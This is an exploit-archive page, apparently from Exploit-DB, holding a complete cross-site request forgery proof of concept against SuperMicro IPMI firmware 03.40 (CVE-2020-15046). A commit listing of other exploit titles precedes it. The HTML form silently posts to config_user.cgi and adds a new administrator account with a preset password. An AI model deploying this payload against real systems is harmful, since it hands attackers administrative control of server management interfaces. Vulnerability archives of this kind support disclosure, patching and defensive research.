8bb6bd8fb0
8 changes to exploits/shellcodes SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin) Zyxel Armor X1 WAP6806 - Directory Traversal Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection Online Polling System 1.0 - Authentication Bypass Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting Infor Storefront B2B 1.0 - 'usr_name' SQL Injection
28 lines
No EOL
1.2 KiB
Text
28 lines
No EOL
1.2 KiB
Text
# Exploit Title: SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)
|
|
# Exploit Author: Metin Yunus Kandemir
|
|
# Date: 2020-07-15
|
|
# Vendor Homepage: https://www.supermicro.com/
|
|
# Version: X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
|
|
# CVE: CVE-2020-15046
|
|
# Source: https://www.totalpentest.com/post/supermicro-ipmi-webgui-cross-site-request-forgery
|
|
|
|
# Description:
|
|
# The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
|
|
# allows remote attackers to exploit a cgi/config_user.cgi CSRF issue to add new admin users.
|
|
# The fixed versions are BIOS 3.2 and firmware 03.88.
|
|
|
|
# PoC :
|
|
|
|
<html>
|
|
<!-- CSRF PoC - generated by Burp Suite Professional -->
|
|
<body>
|
|
<script>history.pushState('', '', '/')</script>
|
|
<form action="https://SuperMicro-IP/cgi/config_user.cgi" method="POST">
|
|
<input type="hidden" name="username" value="JOKER" />
|
|
<input type="hidden" name="original_username" value="2" />
|
|
<input type="hidden" name="password" value="onebadday" />
|
|
<input type="hidden" name="new_privilege" value="4" />
|
|
<input type="submit" value="submit request" />
|
|
</form>
|
|
</body>
|
|
</html> |